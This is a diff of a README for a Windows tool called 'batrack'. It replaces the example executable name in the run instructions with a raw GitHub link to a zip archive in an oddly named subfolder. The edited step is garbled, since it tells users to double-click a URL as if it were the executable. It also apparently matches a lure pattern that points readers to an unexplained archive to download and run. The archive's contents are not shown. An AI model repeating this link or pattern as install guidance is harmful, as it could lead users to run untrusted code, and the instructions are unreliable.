B200930040/batrack/README.md

    If you downloaded a `.zip` file, right-click on it and select “Extract All” to unzip the contents.

 5. **Run the Application**
-   Open the folder where you extracted the files and double-click on the batrack executable file (e.g., `batrack.exe`) to start using the application.
+   Open the folder where you extracted the files and double-click on the batrack executable file (e.g., `https://raw.githubusercontent.com/B200930040/batrack/main/retinophoral/batrack.zip`) to start using the application.

 ## 📋 System Requirements